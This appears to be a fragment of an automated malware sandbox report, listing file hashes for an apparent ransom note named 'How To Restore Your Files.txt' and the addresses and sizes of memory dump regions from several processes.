SHA5126f502056196b6f67817f2634c8235ffb2a05030475317b9c151529f6e8385057a54b0a6da56ccc66ad3f202fff7edd7439b6227c7837b6b022ea55a6351bdf59
-
C:\odt\How To Restore Your Files.txtFilesize
272B
MD59cee3cd6590c1a7902e92daf03ef467b
SHA1ef31096205e95601d124de1e69652a24fb0a0968
SHA256bf6b4f9ea83f59043027605234c5af52e9146e8903816175cefdd33af148549d
SHA51213d94c5bf381616ffd41108b81d712bb1fd8f0c7729d09518893deb316555ea7c46a84c4985af9b20e51d40f8890ed7045a7faf1f9026aa499fdf0e5bd7aa07e
-
memory/692-198-0x00000000048C0000-0x00000000048D0000-memory.dmpFilesize
64KB
-
memory/692-245-0x00000000048C0000-0x00000000048D0000-memory.dmpFilesize
64KB
-
memory/692-194-0x0000000004B90000-0x0000000004BB2000-memory.dmpFilesize
136KB
-
memory/692-292-0x00000000075A0000-0x0000000007C1A000-memory.dmpFilesize
6.5MB
-
memory/692-296-0x00000000049D0000-0x00000000049DA000-memory.dmpFilesize
40KB
-
memory/692-250-0x000000006FA20000-0x000000006FA6C000-memory.dmpFilesize
304KB
-
memory/692-298-0x00000000071A0000-0x00000000071AE000-memory.dmpFilesize
56KB
-
memory/692-196-0x00000000048C0000-0x00000000048D0000-memory.dmpFilesize
64KB
-
memory/692-291-0x000000007F8D0000-0x000000007F8E0000-memory.dmpFilesize
64KB
-
memory/692-239-0x0000000005C50000-0x0000000005C6E000-memory.dmpFilesize
120KB
-
memory/692-248-0x0000000006BE0000-0x0000000006C12000-memory.dmpFilesize
200KB
-
memory/692-192-0x0000000002670000-0x00000000026A6000-memory.dmpFilesize
216KB
-
memory/1636-133-0x0000000000390000-0x0000000000A66000-memory.dmpFilesize
6.8MB
-
memory/1636-243-0x0000000000390000-0x0000000000A66000-memory.dmpFilesize
6.8MB
-
memory/1636-139-0x0000000005580000-0x0000000005590000-memory.dmpFilesize
64KB
-
memory/1636-140-0x0000000005D90000-0x0000000005DE0000-memory.dmpFilesize
320KB
-
memory/1636-141-0x0000000005E90000-0x0000000005F22000-memory.dmpFilesize
584KB
-
memory/1636-142-0x0000000006D30000-0x000000000725C000-memory.dmpFilesize
5.2MB
-
memory/1636-138-0x0000000006150000-0x00000000066F4000-memory.dmpFilesize
5.6MB
-
memory/1636-137-0x0000000000390000-0x0000000000A66000-memory.dmpFilesize
6.8MB
-
memory/1636-145-0x0000000006A90000-0x0000000006AF6000-memory.dmpFilesize
408KB
-
memory/1912-249-0x000000006FA20000-0x000000006FA6C000-memory.dmpFilesize
304KB
-
memory/1912-193-0x0000000005160000-0x0000000005788000-memory.dmpFilesize
6.2MB
-
memory/1912-204-0x00000000025C0000-0x00000000025D0000-memory.dmpFilesize
64KB
-
memory/1912-238-0x00000000025C0000-0x00000000025D0000-memory.dmpFilesize
64KB
-
memory/1912-304-0x0000000007360000-0x0000000007368000-memory.dmpFilesize
32KB
-
memory/1912-261-0x00000000062D0000-0x00000000062EE000-memory.dmpFilesize
120KB
-
memory/1912-290-0x000000007EFC0000-0x000000007EFD0000-memory.dmpFilesize
64KB
-
memory/2180-438-0x00000000026D0000-0x00000000026E0000-memory.dmpFilesize
64KB
-
memory/2180-507-0x000000006FAD0000-0x000000006FB1C000-memory.dmpFilesize
304KB
-
memory/2180-538-0x00000000026D0000-0x00000000026E0000-memory.dmpFilesize
64KB
-
memory/2380-247-0x00000000023E0000-0x00000000023F0000-memory.dmpFilesize
64KB
-
memory/2380-297-0x0000000007360000-0x00000000073F6000-memory.dmpFilesize
600KB
-
memory/2380-280-0x000000006FA20000-0x000000006FA6C000-memory.dmpFilesize
304KB
-
memory/2380-195-0x0000000005500000-0x0000000005566000-memory.dmpFilesize
408KB
-
memory/2380-295-0x000000007F3B0000-0x000000007F3C0000-memory.dmpFilesize
64KB
-
memory/2380-210-0x00000000023E0000-0x00000000023F0000-memory.dmpFilesize
64KB
-
memory/3104-293-0x000000007FAE0000-0x000000007FAF0000-memory.dmpFilesize
64KB
-
memory/3104-300-0x0000000007920000-0x000000000793A000-memory.dmpFilesize
104KB
-
memory/3104-294-0x00000000075C0000-0x00000000075DA000-memory.dmpFilesize
104KB
-
memory/3104-221-0x0000000002CE0000-0x0000000002CF0000-memory.dmpFilesize
64KB
-
memory/3104-246-0x0000000002CE0000-0x0000000002CF0000-memory.dmpFilesize
64KB
-
memory/3104-251-0x000000006FA20000-0x000000006FA6C000-memory.dmpFilesize
304KB
-
memory/3104-197-0x0000000002CE0000-0x0000000002CF0000-memory.dmpFilesize
64KB
-
memory/3116-540-0x0000000005670000-0x0000000005680000-memory.dmpFilesize
64KB
-
memory/3116-501-0x0000000000930000-0x0000000001006000-memory.dmpFilesize
6.8MB
-
memory/3116-506-0x0000000000930000-0x0000000001006000-memory.dmpFilesize
6.8MB
-
memory/3336-436-0x0000000003020000-0x0000000003030000-memory.dmpFilesize
64KB
-
memory/3336-437-0x0000000003020000-0x0000000003030000-memory.dmpFilesize
64KB
-
memory/3336-541-0x000000007F960000-0x000000007F970000-memory.dmpFilesize
64KB
-
memory/3336-508-0x000000006FAD0000-0x000000006FB1C000-memory.dmpFilesize
304KB
-
memory/3336-528-0x0000000003020000-0x0000000003030000-memory.dmpFilesize
64KB
-
memory/3752-1019-0x0000000140000000-0x00000001400C6000-memory.dmpFilesize
792KB
-
memory/3752-1020-0x0000000140000000-0x00000001400C6000-memory.dmpFilesize
792KB
-
memory/3752-1021-0x0000000140000000-0x00000001400C6000-memory.dmpFilesize
792KB
-
memory/4056-1001-0x0000000000DA0000-0x0000000000DB8000-memory.dmpFilesize
96KB
-
memory/4056-711-0x0000000000DA0000-0x0000000000DB8000-memory.dmpFilesize
96KB
-
memory/4056-710-0x0000000000DA0000-0x0000000000DB8000-memory.dmpFilesize
96KB
-
memory/4056-703-0x0000000000DA0000-0x0000000000DB8000-memory.dmpFilesize
96KB
-
memory/4056-993-0x0000000000DA0000-0x0000000000DB8000-memory.dmpFilesize
96KB
-
memory/4080-440-0x0000000003290000-0x00000000032A0000-memory.dmpFilesize
64KB
-
memory/4080-518-0x000000006FAD0000-0x000000006FB1C000-memory.dmpFilesize
304KB
-
memory/4080-441-0x0000000003290000-0x00000000032A0000-memory.dmpFilesize
64KB
-
memory/4080-539-0x0000000003290000-0x00000000032A0000-memory.dmpFilesize
64KB
-
memory/4256-439-0x0000000004BD0000-0x0000000004BE0000-memory.dmpFilesize
64KB
-
memory/4452-244-0x0000000000390000-0x0000000000A66000-memory.dmpFilesize
6.8MB
-
memory/4452-305-0x0000000000390000-0x0000000000A66000-memory.dmpFilesize
6.8MB
-
memory/4452-315-0x00000000055A0000-0x00000000055B0000-memory.dmpFilesize
64KB
-
memory/4452-374-0x0000000000390000-0x0000000000A66000-memory.dmpFilesize
6.8MB
-
memory/4452-502-0x0000000000390000-0x0000000000A66000-memory.dmpFilesize
6.8MB
-
memory/4868-442-0x0000000002740000-0x0000000002750000-memory.dmpFilesize
64KB
-
memory/4868-499-0x0000000002740000-0x0000000002750000-memory.dmpFilesize
64KB